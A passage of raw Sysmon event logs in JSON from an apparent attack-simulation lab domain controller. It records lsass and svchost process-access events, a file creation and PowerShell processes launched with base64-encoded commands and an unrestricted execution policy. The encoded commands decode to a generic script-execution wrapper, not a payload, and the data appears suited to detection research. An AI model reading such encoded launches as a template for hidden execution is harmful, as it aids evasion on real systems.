C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.299","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1a4e6|C:\\Windows\\system32\\lsasrv.dll+1ba8f|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5560,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.299\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-1F63-5F25-0000-0010B1CD0000}\r\nTargetProcessId: 1312\r\nTargetImage: C:\\Windows\\system32\\svchost.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.299","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-1F63-5F25-0000-0010B1CD0000}","TargetProcessId":"1312","TargetImage":"C:\\Windows\\system32\\svchost.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+11c6e|C:\\Windows\\system32\\lsasrv.dll+1e0a8|C:\\Windows\\system32\\lsasrv.dll+1d2d1|C:\\Windows\\system32\\lsasrv.dll+1bb00|C:\\Windows\\system32\\lsasrv.dll+2810b|C:\\Windows\\SYSTEM32\\SspiSrv.dll+1467|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5561,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.315\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-00106CE50800}\r\nTargetProcessId: 4884\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.315","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-00106CE50800}","TargetProcessId":"4884","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":5562,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.315\r\nProcessGuid: {41C8662E-20D7-5F25-0000-00106CE50800}\r\nProcessId: 4884\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_3xpxfw2j.14m.ps1\r\nCreationUtcTime: 2020-08-01 07:59:19.315","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.315","ProcessGuid":"{41C8662E-20D7-5F25-0000-00106CE50800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\Users\\Administrator\\AppData\\Local\\Temp\\__PSScriptPolicyTest_3xpxfw2j.14m.ps1","CreationUtcTime":"2020-08-01 07:59:19.315","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5563,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.362\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-00106CE50800}\r\nTargetProcessId: 4884\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.362","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-00106CE50800}","TargetProcessId":"4884","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5564,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.362\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 904\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-20D7-5F25-0000-00106CE50800}\r\nTargetProcessId: 4884\r\nTargetImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.362","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"904","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-20D7-5F25-0000-00106CE50800}","TargetProcessId":"4884","TargetImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:20","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:19","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":5565,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:19.412\r\nProcessGuid: {41C8662E-20D7-5F25-0000-001081F10800}\r\nProcessId: 3496\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nFileVersion: 10.0.14393.206 (rs1_release.160915-0644)\r\nDescription: Windows PowerShell\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: PowerShell.EXE\r\nCommandLine: \"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand JgBjAGgAYwBwAC4AYwBvAG0AIAA2ADUAMAAwADEAIAA+ACAAJABuAHUAbABsAAoAJABlAHgAZQBjAF8AdwByAGEAcABwAGUAcgBfAHMAdAByACAAPQAgACQAaQBuAHAAdQB0ACAAfAAgAE8AdQB0AC0AUwB0AHIAaQBuAGcACgAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAgAD0AIAAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAF8AcwB0AHIALgBTAHAAbABpAHQAKABAACgAIgBgADAAYAAwAGAAMABgADAAIgApACwAIAAyACwAIABbAFMAdAByAGkAbgBnAFMAcABsAGkAdABPAHAAdABpAG8AbgBzAF0AOgA6AFIAZQBtAG8AdgBlAEUAbQBwAHQAeQBFAG4AdAByAGkAZQBzACkACgBJAGYAIAAoAC0AbgBvAHQAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwAuAEwAZQBuAGcAdABoACAALQBlAHEAIAAyACkAIAB7ACAAdABoAHIAbwB3ACAAIgBpAG4AdgBhAGwAaQBkACAAcABhAHkAbABvAGEAZAAiACAAfQAKAFMAZQB0AC0AVgBhAHIAaQBhAGIAbABlACAALQBOAGEAbQBlACAAagBzAG8AbgBfAHIAYQB3ACAALQBWAGEAbAB1AGUAIAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADEAXQAKACQAZQB4AGUAYwBfAHcAcgBhAHAAcABlAHIAIAA9ACAAWwBTAGMAcgBpAHAAdABCAGwAbwBjAGsAXQA6ADoAQwByAGUAYQB0AGUAKAAkAHMAcABsAGkAdABfAHAAYQByAHQAcwBbADAAXQApAAoAJgAkAGUAeABlAGMAXwB3AHIAYQBwAHAAZQByAA==\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20D7-5F25-0000-0020ADE10800}\r\nLogonId: 0x8E1AD\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453\r\nParentProcessGuid: {41C8662E-20D7-5F25-0000-00106CE50800}\r\nParentProcessId: 4884\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: PowerShell  -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAASgBnAEIAagBBAEcAZwBBAFkAdwBCAHcAQQBDADQAQQBZAHcAQgB2AEEARwAwAEEASQBBAEEAMgBBAEQAVQBBAE0AQQBBAHcAQQBEAEUAQQBJAEEAQQArAEEAQwBBAEEASgBBAEIAdQBBAEgAVQBBAGIAQQBCAHMAQQBBAG8AQQBKAEEAQgBsAEEASABnAEEAWgBRAEIAagBBAEYAOABBAGQAdwBCAHkAQQBHAEUAQQBjAEEAQgB3AEEARwBVAEEAYwBnAEIAZgBBAEgATQBBAGQAQQBCAHkAQQBDAEEAQQBQAFEAQQBnAEEAQwBRAEEAYQBRAEIAdQBBAEgAQQBBAGQAUQBCADAAQQBDAEEAQQBmAEEAQQBnAEEARQA4AEEAZABRAEIAMABBAEMAMABBAFUAdwBCADAAQQBIAEkAQQBhAFEAQgB1AEEARwBjAEEAQwBnAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAGcAQQBEADAAQQBJAEEAQQBrAEEARwBVAEEAZQBBAEIAbABBAEcATQBBAFgAdwBCADMAQQBIAEkAQQBZAFEAQgB3AEEASABBAEEAWgBRAEIAeQBBAEYAOABBAGMAdwBCADAAQQBIAEkAQQBMAGcAQgBUAEEASABBAEEAYgBBAEIAcABBAEgAUQBBAEsAQQBCAEEAQQBDAGcAQQBJAGcAQgBnAEEARABBAEEAWQBBAEEAdwBBAEcAQQBBAE0AQQBCAGcAQQBEAEEAQQBJAGcAQQBwAEEAQwB3AEEASQBBAEEAeQBBAEMAdwBBAEkAQQBCAGIAQQBGAE0AQQBkAEEAQgB5AEEARwBrAEEAYgBnAEIAbgBBAEYATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBQAEEASABBAEEAZABBAEIAcABBAEcAOABBAGIAZwBCAHoAQQBGADAAQQBPAGcAQQA2AEEARgBJAEEAWgBRAEIAdABBAEcAOABBAGQAZwBCAGwAQQBFAFUAQQBiAFEAQgB3AEEASABRAEEAZQBRAEIARgBBAEcANABBAGQAQQBCAHkAQQBHAGsAQQBaAFEAQgB6AEEAQwBrAEEAQwBnAEIASgBBAEcAWQBBAEkAQQBBAG8AQQBDADAAQQBiAGcAQgB2AEEASABRAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBBAHUAQQBFAHcAQQBaAFEAQgB1AEEARwBjAEEAZABBAEIAbwBBAEMAQQBBAEwAUQBCAGwAQQBIAEUAQQBJAEEAQQB5AEEAQwBrAEEASQBBAEIANwBBAEMAQQBBAGQAQQBCAG8AQQBIAEkAQQBiAHcAQgAzAEEAQwBBAEEASQBnAEIAcABBAEcANABBAGQAZwBCAGgAQQBHAHcAQQBhAFEAQgBrAEEAQwBBAEEAYwBBAEIAaABBAEgAawBBAGIAQQBCAHYAQQBHAEUAQQBaAEEAQQBpAEEAQwBBAEEAZgBRAEEASwBBAEYATQBBAFoAUQBCADAAQQBDADAAQQBWAGcAQgBoAEEASABJAEEAYQBRAEIAaABBAEcASQBBAGIAQQBCAGwAQQBDAEEAQQBMAFEAQgBPAEEARwBFAEEAYgBRAEIAbABBAEMAQQBBAGEAZwBCAHoAQQBHADgAQQBiAGcAQgBmAEEASABJAEEAWQBRAEIAMwBBAEMAQQBBAEwAUQBCAFcAQQBHAEUAQQBiAEEAQgAxAEEARwBVAEEASQBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEUAQQBYAFEAQQBLAEEAQwBRAEEAWgBRAEIANABBAEcAVQBBAFkAdwBCAGYAQQBIAGMAQQBjAGcAQgBoAEEASABBAEEAYwBBAEIAbABBAEgASQBBAEkAQQBBADkAQQBDAEEAQQBXAHcAQgBUAEEARwBNAEEAYwBnAEIAcABBAEgAQQBBAGQAQQBCAEMAQQBHAHcAQQBiAHcAQgBqAEEARwBzAEEAWABRAEEANgBBAEQAbwBBAFEAdwBCAHkAQQBHAFUAQQBZAFEAQgAwAEEARwBVAEEASwBBAEEAawBBAEgATQBBAGMAQQBCAHMAQQBHAGsAQQBkAEEAQgBmAEEASABBAEEAWQBRAEIAeQBBAEgAUQBBAGMAdwBCAGIAQQBEAEEAQQBYAFEAQQBwAEEAQQBvAEEASgBnAEEAawBBAEcAVQBBAGUAQQBCAGwAQQBHAE0AQQBYAHcAQgAzAEEASABJAEEAWQBRAEIAdwBBAEgAQQBBAFoAUQBCAHkAQQBBAD0APQA=","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:19.412","ProcessGuid":"{41C8662E-20D7-5F25-0000-001081F10800}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","FileVersion":"10.0.14393.206 (rs1_release.160915-0644)","Description":"Windows PowerShell","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"PowerShell.EXE","CommandLine":"\"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand 